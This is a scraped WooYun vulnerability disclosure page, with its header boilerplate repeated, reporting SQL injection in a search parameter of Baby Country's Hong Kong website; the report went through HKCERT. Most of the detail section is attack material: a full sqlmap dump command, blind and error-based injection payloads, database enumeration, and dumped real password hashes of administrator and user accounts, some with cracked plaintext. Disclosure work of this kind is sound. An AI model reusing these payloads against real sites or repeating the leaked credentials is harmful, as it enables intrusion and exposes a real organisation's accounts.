Baby Country某处存在SQL注射漏洞（管理密码泄露）（香港地區）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0156619

漏洞标题：Baby Country某处存在SQL注射漏洞（管理密码泄露）（香港地區）

漏洞作者：路人甲

提交时间：2015-12-01 11:26

修复时间：2016-01-15 16:22

公开时间：2016-01-15 16:22

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-12-01：细节已通知厂商并且等待厂商处理中
2015-12-01：厂商已经确认，细节仅向厂商公开
2015-12-11：细节向核心白帽子及相关领域专家公开
2015-12-21：细节向普通白帽子公开
2015-12-31：细节向实习白帽子公开
2016-01-15：细节向公众公开

简要描述：

Baby Country某处存在SQL注射漏洞（管理密码泄露）

详细说明：

地址：http://**.**.**.**/ch/searchproducts.php?cat=BtmC&searchkey=

$ python sqlmap.py -u "http://**.**.**.**/ch/searchproducts.php?cat=BtmC&searchkey=" -p searchkey --technique=BE --random-agent --batch  -D hkbaby_pos -T t_user -C mName,mPassword,mTel,mEmail,mMobile_Phone --dump

Database: hkbaby_pos
Table: t_user
[6 entries]
+-------------------+---------------------------------------------+---------+---------+---------------+
| mName             | mPassword                                   | mTel    | mEmail  | mMobile_Phone |
+-------------------+---------------------------------------------+---------+---------+---------------+
| Administrator     | b8369ee75671dcdc385aa51b268d6c42            | NULL    | NULL    | NULL          |
| Administrator     | 6E4BA784DC5EB7D6004D5A241246D60F            | <blank> | <blank> | <blank>       |
| 101               | 38B3EFF8BAF56627478EC76A704E9B52 (101)      | <blank> | <blank> | <blank>       |
| 108               | A3C65C2974270FD093EE8A9BF8AE7D0B (108)      | <blank> | <blank> | <blank>       |
| Central Logistics | D41D8CD98F00B204E9800998ECF8427E ()         | <blank> | <blank> | <blank>       |
| 技術支援              | B911D003A4B0252F650671B38EAD7FB1 (pericles) | <blank> | <blank> | <blank>       |
+-------------------+---------------------------------------------+---------+---------+---------------+

漏洞证明：

---
Parameter: searchkey (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cat=BtmC&searchkey=%' AND 3158=3158 AND '%'='
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: cat=BtmC&searchkey=%' AND (SELECT 7614 FROM(SELECT COUNT(*),CONCAT(0x71716b6b71,(SELECT (ELT(7614=7614,1))),0x71627a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
---
web application technology: Apache
back-end DBMS: MySQL 5.0
current user:    'hkbabywebsite@%'
current user is DBA:    False
database management system users [1]:
[*] 'hkbabywebsite'@'%'
Database: information_schema
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| COLUMNS                               | 1495    |
| SESSION_VARIABLES                     | 512     |
| GLOBAL_VARIABLES                      | 497     |
| GLOBAL_STATUS                         | 403     |
| SESSION_STATUS                        | 403     |
| STATISTICS                            | 302     |
| COLLATION_CHARACTER_SET_APPLICABILITY | 219     |
| COLLATIONS                            | 219     |
| KEY_COLUMN_USAGE                      | 202     |
| PARTITIONS                            | 147     |
| TABLES                                | 147     |
| TABLE_CONSTRAINTS                     | 136     |
| PLUGINS                               | 46      |
| CHARACTER_SETS                        | 40      |
| INNODB_FT_DEFAULT_STOPWORD            | 36      |
| SCHEMA_PRIVILEGES                     | 16      |
| ENGINES                               | 9       |
| INDEX_STATISTICS                      | 7       |
| TABLE_STATISTICS                      | 6       |
| SCHEMATA                              | 2       |
| PROCESSLIST                           | 1       |
| USER_PRIVILEGES                       | 1       |
+---------------------------------------+---------+
Database: hkbaby_pos
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| t_product_tx                          | 3787    |
| t_invoice_detail                      | 2115    |
| t_product_stock                       | 1955    |
| t_invoice                             | 1340    |
| t_invoice_moneycurrency               | 1327    |
| t_invoice_paytype                     | 1327    |
| t_customer                            | 1322    |
| t_update                              | 1157    |
| t_product_barcode                     | 1001    |
| t_product                             | 829     |
| t_product_pricegroup                  | 805     |
| t_usergroup_right                     | 624     |
| log_info                              | 475     |
| t_supplier_invoice_in_detail          | 447     |
| t_trading_invoice_detail              | 443     |
| t_log                                 | 355     |
| t_trading_invoice                     | 171     |
| t_stock_adjustment_in_detail          | 162     |
| t_stocktake_detail                    | 162     |
| t_wishlist                            | 126     |
| t_brand                               | 91      |
| t_category                            | 75      |
| t_supplier_invoice_in                 | 74      |
| t_size                                | 22      |
| t_supplier                            | 21      |
| t_color                               | 16      |
| t_paytype                             | 8       |
| t_website                             | 7       |
| t_user                                | 6       |
| t_labelbarcode                        | 4       |
| t_usergroup                           | 4       |
| t_moneycurrency                       | 3       |
| t_stock                               | 3       |
| ad_right                              | 2       |
| t_groupdiscount                       | 2       |
| t_sc                                  | 2       |
| t_station                             | 2       |
| t_unit                                | 2       |
| t_company                             | 1       |
| t_stock_adjustment_in                 | 1       |
| t_stocktake                           | 1       |
+---------------------------------------+---------+
columns LIKE 'pass' were found in the following databases:
Database: hkbaby_pos
Table: t_company_onetimedicount
[1 column]
+-----------+--------------+
| Column    | Type         |
+-----------+--------------+
| mPassword | varchar(255) |
+-----------+--------------+
Database: hkbaby_pos
Table: t_company
[1 column]
+---------------+--------------+
| Column        | Type         |
+---------------+--------------+
| mFtp_Password | varchar(255) |
+---------------+--------------+
Database: hkbaby_pos
Table: t_user
[1 column]
+-----------+--------------+
| Column    | Type         |
+-----------+--------------+
| mPassword | varchar(255) |
+-----------+--------------+
Database: hkbaby_pos
Table: t_company
[1 entry]
+---------------+
| mFtp_Password |
+---------------+
| NULL          |
+---------------+
Database: hkbaby_pos
Table: t_user
[6 entries]
+---------------------------------------------+
| mPassword                                   |
+---------------------------------------------+
| 38B3EFF8BAF56627478EC76A704E9B52 (101)      |
| 6E4BA784DC5EB7D6004D5A241246D60F            |
| A3C65C2974270FD093EE8A9BF8AE7D0B (108)      |
| b8369ee75671dcdc385aa51b268d6c42            |
| B911D003A4B0252F650671B38EAD7FB1 (pericles) |
| D41D8CD98F00B204E9800998ECF8427E ()         |
+---------------------------------------------+
Database: hkbaby_pos
Table: t_company_onetimedicount
[0 entries]
+-----------+
| mPassword |
+-----------+
+-----------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: searchkey (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cat=BtmC&searchkey=%' AND 3158=3158 AND '%'='
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: cat=BtmC&searchkey=%' AND (SELECT 7614 FROM(SELECT COUNT(*),CONCAT(0x71716b6b71,(SELECT (ELT(7614=7614,1))),0x71627a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
---
web application technology: Apache
back-end DBMS: MySQL 5.0
Database: hkbaby_pos
Table: t_user
[13 columns]
+-----------------+--------------+
| Column          | Type         |
+-----------------+--------------+
| mAddress        | mediumtext   |
| mCode           | varchar(255) |
| mDepartment     | varchar(255) |
| mEmail          | varchar(255) |
| mFax            | varchar(255) |
| mMobile_Phone   | varchar(255) |
| mName           | varchar(255) |
| mNon_Active     | smallint(6)  |
| mPassword       | varchar(255) |
| mRemarks        | mediumtext   |
| mTel            | varchar(255) |
| mUserGroup_Code | varchar(255) |
| T_User_ID       | int(11)      |
+-----------------+--------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: searchkey (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cat=BtmC&searchkey=%' AND 3158=3158 AND '%'='
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: cat=BtmC&searchkey=%' AND (SELECT 7614 FROM(SELECT COUNT(*),CONCAT(0x71716b6b71,(SELECT (ELT(7614=7614,1))),0x71627a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
---
web application technology: Apache
back-end DBMS: MySQL 5.0
Database: hkbaby_pos
Table: t_user
[6 entries]
+-------------------+---------------------------------------------+---------+---------+---------------+
| mName             | mPassword                                   | mTel    | mEmail  | mMobile_Phone |
+-------------------+---------------------------------------------+---------+---------+---------------+
| Administrator     | b8369ee75671dcdc385aa51b268d6c42            | NULL    | NULL    | NULL          |
| Administrator     | 6E4BA784DC5EB7D6004D5A241246D60F            | <blank> | <blank> | <blank>       |
| 101               | 38B3EFF8BAF56627478EC76A704E9B52 (101)      | <blank> | <blank> | <blank>       |
| 108               | A3C65C2974270FD093EE8A9BF8AE7D0B (108)      | <blank> | <blank> | <blank>       |
| Central Logistics | D41D8CD98F00B204E9800998ECF8427E ()         | <blank> | <blank> | <blank>       |
| 技術支援              | B911D003A4B0252F650671B38EAD7FB1 (pericles) | <blank> | <blank> | <blank>       |
+-------------------+---------------------------------------------+---------+---------+---------------+

修复方案：

上WAF。

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：6

确认时间：2015-12-01 16:21

厂商回复：

Referred to related parties.

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0156619

漏洞标题：Baby Country某处存在SQL注射漏洞（管理密码泄露）（香港地區）

相关厂商：Baby Country

漏洞作者：路人甲

提交时间：2015-12-01 11:26

修复时间：2016-01-15 16:22

公开时间：2016-01-15 16:22

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0156619

漏洞标题：Baby Country某处存在SQL注射漏洞（管理密码泄露）（香港地區）

相关厂商：Baby Country

漏洞作者： 路人甲

提交时间：2015-12-01 11:26

修复时间：2016-01-15 16:22

公开时间：2016-01-15 16:22

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0156619"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云